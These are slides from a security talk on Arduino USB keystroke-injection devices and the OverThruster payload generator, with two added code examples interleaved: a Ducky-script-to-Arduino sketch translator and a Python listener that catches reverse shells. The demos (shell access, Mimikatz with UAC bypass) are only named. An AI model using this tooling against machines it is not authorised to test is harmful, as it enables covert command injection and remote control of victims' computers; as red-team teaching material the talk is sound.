
Arduino based HID Attacks

by Brendan Hohenadel

Why you should listen to me*

  • Cyber Forensic Analyst at U of G
  • I like to hack stuff
  • I’m cheap
  • I dream of Red Teaming
  • I have letters after my name: OSCP, OSCE, CISSP
  • I wrote OverThruster:
  • On Twitter @bhohenadel (sorry, no Mastodon)
  • *You shouldn’t listen to me. Now’s your chance for a smoke break. Go now. I’ll pause and wait.

Presentation Schedule

  • Title Slide
  • Personal Introduction Slide
  • This Slide
  • Rest of the presentation

A Little History Lesson

USB Rubber Ducky

USB Ducky Scripts

  DELAY 3000
  GUI r
  DELAY 500
  STRING notepad
  DELAY 500
  ENTER
  DELAY 750
  STRING Hello World!!!
  ENTER


Programmable HID USB Keystroke Dongle by Adrian Crenshaw aka IronGeek at DEF CON 18

  • Built on Teensy 2.0
    • too expensive
  • Looks suspicious…


Samy Kamkar’s USBdriveby

  • Modifies DNS
  • Teensy 3.1
    • Too expensive
  • Designed for OS X
  • Looks suspicious…

Lots of others

  • Offensive Security’s Peensy
  • NetHunter (Android phone based)
  • Kautilya by Nikhil Mittal
  • Lots more on GitHub, all based on Teensy

So I bought Teensy 3.1

  • Started learning PowerShell
  • Started making payloads
  • Discovered LED_STATUS
  • Still not happy about the cost...

Elie Bursztein at BlackHat 24

AliExpress to the Rescue!

My Cost

  • Mini SS Micro Arduino (testing/keychain)
  • Pro Micro Arduino x10
  • USB Type A Connector x10
  • USB case x10
  • Cost per device
Testing, Learning, Testing, Learning

  • Arduino’s Keyboard library is different from Teensy’s…
  • Arduino’s Keyboard library is more limited than Teensy’s…
  • (these) Arduinos have no reset/program button like the Teensy…

OverThruster was Born

  • Inspired by one of the greatest sci-fi films ever made
  • Menu-driven Python script
  • ONLY standard Python libraries
  • Generates Arduino sketches for various payloads
  • Highly customizable
  • Multiple UAC bypass methods
  • Optional notification bubble to distract the user
  • Helper functions that work with some of the payloads
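The Ducky script in the history section and the "generates Arduino sketches" bullet describe the same translation step: keystroke script in, Keyboard.h sketch out. The following is an added example, not OverThruster's code and not from the original slides: a stdlib-only Python translator that turns a Ducky script into a sketch for Arduino's Keyboard library (the one a Pro Micro uses instead of Teensy's, with its own constant names such as KEY_LEFT_GUI and KEY_RETURN). The `hold_ms` and `safety_pin` parameters, the function names and the sample script text are this example's own choices; the safety-pin guard is a common workaround for boards with no reset button and is not something the slides describe.

```python
"""Translate a USB Rubber Ducky script into an Arduino Keyboard.h sketch.

Constructed example for a Pro Micro / Leonardo (ATmega32U4). Arduino's
Keyboard library names keys KEY_LEFT_GUI, KEY_RETURN, ... and types text
through a US-ASCII lookup table, so characters outside it are dropped.
"""

# Ducky key names -> Arduino Keyboard.h constants (Teensy uses different names).
KEYS = {
    "ENTER": "KEY_RETURN", "TAB": "KEY_TAB", "ESCAPE": "KEY_ESC", "ESC": "KEY_ESC",
    "DELETE": "KEY_DELETE", "BACKSPACE": "KEY_BACKSPACE", "SPACE": "' '",
    "UP": "KEY_UP_ARROW", "UPARROW": "KEY_UP_ARROW",
    "DOWN": "KEY_DOWN_ARROW", "DOWNARROW": "KEY_DOWN_ARROW",
    "LEFT": "KEY_LEFT_ARROW", "LEFTARROW": "KEY_LEFT_ARROW",
    "RIGHT": "KEY_RIGHT_ARROW", "RIGHTARROW": "KEY_RIGHT_ARROW",
    "GUI": "KEY_LEFT_GUI", "WINDOWS": "KEY_LEFT_GUI", "COMMAND": "KEY_LEFT_GUI",
    "CTRL": "KEY_LEFT_CTRL", "CONTROL": "KEY_LEFT_CTRL",
    "ALT": "KEY_LEFT_ALT", "SHIFT": "KEY_LEFT_SHIFT",
}
KEYS.update({f"F{n}": f"KEY_F{n}" for n in range(1, 13)})

# Constructed sample: the "Hello World" Ducky script from the slide, one command per line.
SAMPLE = """REM constructed from the Rubber Ducky "Hello World" script on the slide
DELAY 3000
GUI r
DELAY 500
STRING notepad
DELAY 500
ENTER
DELAY 750
STRING Hello World!!!
ENTER
"""


def c_string(text):
    """Escape text as a C string literal for Keyboard.print()."""
    return '"' + text.replace("\\", "\\\\").replace('"', '\\"') + '"'


def key_expr(token):
    """Map one Ducky key token to a Keyboard.press()/write() argument."""
    if token.upper() in KEYS:
        return KEYS[token.upper()]
    if len(token) == 1:                      # plain character such as 'r'
        return "'" + token.replace("\\", "\\\\").replace("'", "\\'") + "'"
    raise ValueError(f"unknown key token: {token!r}")


def translate(script, hold_ms=100, safety_pin=None):
    """Return the text of an Arduino sketch that replays `script`.

    hold_ms: how long a key chord is held before Keyboard.releaseAll().
    safety_pin (this example's own option): if set, the payload is skipped when
    that pin reads LOW at boot, so jumpering it to GND gets a board with no
    reset button back for reflashing.
    """
    body, default_delay = [], 0
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        tokens = line.split()
        cmd, arg = tokens[0].upper(), line.partition(" ")[2]
        if cmd == "REM":                     # comment: emitted, takes no time
            body.append(f"  // {arg}")
            continue
        if cmd in ("DEFAULT_DELAY", "DEFAULTDELAY"):
            default_delay = int(arg)         # pause added after every later command
            continue
        if cmd == "DELAY":
            body.append(f"  delay({int(arg)});")
        elif cmd == "STRING":
            body.append(f"  Keyboard.print({c_string(arg)});")
        else:
            keys = [key_expr(t) for t in tokens]
            if len(keys) == 1:               # single key: press and release
                body.append(f"  Keyboard.write({keys[0]});")
            else:                            # chord such as GUI r: hold all, release all
                body.extend(f"  Keyboard.press({k});" for k in keys)
                body.append(f"  delay({hold_ms});")
                body.append("  Keyboard.releaseAll();")
        if default_delay:
            body.append(f"  delay({default_delay});")
    guard = ""
    if safety_pin is not None:
        guard = (f"  pinMode({safety_pin}, INPUT_PULLUP);\n"
                 f"  if (digitalRead({safety_pin}) == LOW) return;  // jumpered to GND: skip payload\n")
    return ("#include <Keyboard.h>\n\n"
            "void setup() {\n" + guard +
            "  Keyboard.begin();\n" + "\n".join(body) + "\n"
            "  Keyboard.end();\n}\n\n"
            "void loop() {}\n")


if __name__ == "__main__":
    print(translate(SAMPLE, safety_pin=2))   # pin 2 is an arbitrary free pin on a Pro Micro
```

Every DELAY in the input becomes a hard-coded delay() in the sketch, which is exactly the timing dependency listed later under problems still to work out; the translator does not remove it, it only makes it visible.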

Demo Time!!

  • How the tool works, a simple payload and the listener
  • Poppin’ a shell
  • Mimikatz with UAC Bypass
  • Poppin’ a shell on OS X

Problems to still work out

  • NicoHood’s keyboard library isn’t detected properly in OS X
    • Maybe it is...
  • Need a Python version of netcat for windows users
  • Less dependency on timing/delays
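The "Python version of netcat" on this list is something the tool does not have yet. As an added example, not from the slides and not OverThruster's code, here is a minimal stdlib-only listener that does what `nc -lvp PORT` does when catching a reverse shell: bind, accept one connection, and relay the local console to it. The function names, the default port 4444 and the loopback_demo() helper (which stands in for a real shell so the round trip can be checked offline) are this example's own.

```python
"""Stdlib-only stand-in for `nc -lvp PORT`: catch one reverse shell and relay
the local console to it. Constructed example, not OverThruster's code."""
import io
import socket
import sys
import threading


def bind_listener(host="0.0.0.0", port=4444):
    """Bind and listen on host:port; port 0 lets the OS pick a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def accept_one(srv):
    """Block until one client connects, then stop listening (one shell per run)."""
    conn, peer = srv.accept()
    srv.close()
    return conn, peer


def relay(conn, stdin, stdout):
    """Pump stdin -> socket and socket -> stdout until the remote side closes.

    Text streams are used so this works from a Windows console as well; shell
    output is decoded leniently because cmd.exe/PowerShell are not always UTF-8.
    """
    def sock_to_out():
        while True:
            data = conn.recv(4096)
            if not data:                     # remote shell hung up
                break
            stdout.write(data.decode("utf-8", "replace"))
            stdout.flush()

    reader = threading.Thread(target=sock_to_out, daemon=True)
    reader.start()
    for line in stdin:                       # one command per line, sent as typed
        try:
            conn.sendall(line.encode())
        except OSError:
            break
    try:
        conn.shutdown(socket.SHUT_WR)        # local EOF: tell the shell we are done
    except OSError:
        pass
    reader.join()
    conn.close()


def loopback_demo():
    """Round trip over 127.0.0.1 against a fake 'shell' that echoes each command
    line back prefixed with '> '. Returns what the listener side displayed."""
    srv = bind_listener("127.0.0.1", 0)
    port = srv.getsockname()[1]

    def fake_shell():                        # constructed stand-in for the victim's shell
        with socket.create_connection(("127.0.0.1", port)) as s:
            for line in s.makefile("rb"):
                s.sendall(b"> " + line)

    client = threading.Thread(target=fake_shell)
    client.start()
    conn, _peer = accept_one(srv)
    shown = io.StringIO()
    relay(conn, io.StringIO("whoami\nhostname\n"), shown)
    client.join()
    return shown.getvalue()


if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 4444
    server = bind_listener(port=port)
    print(f"listening on 0.0.0.0:{port} ...", file=sys.stderr)
    sock, peer = accept_one(server)
    print(f"connection from {peer[0]}:{peer[1]}", file=sys.stderr)
    relay(sock, sys.stdin, sys.stdout)
```

Run it as `python listener.py 4444` before the device types its payload; the relay deliberately stops after one connection, so a second shell needs a second run.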

Future Plans

  • Add SD Card/local storage functionality
  • Clean up the code/add comments
  • More payloads
  • FIND A SUITABLE CASE (maybe resin casting?)

Until my DIY is done...

  • 5 for $25
  • Arduino Pro Micro based
  • But no storage...


Or maybe a minute or two of awkward silence before I slowly walk away...
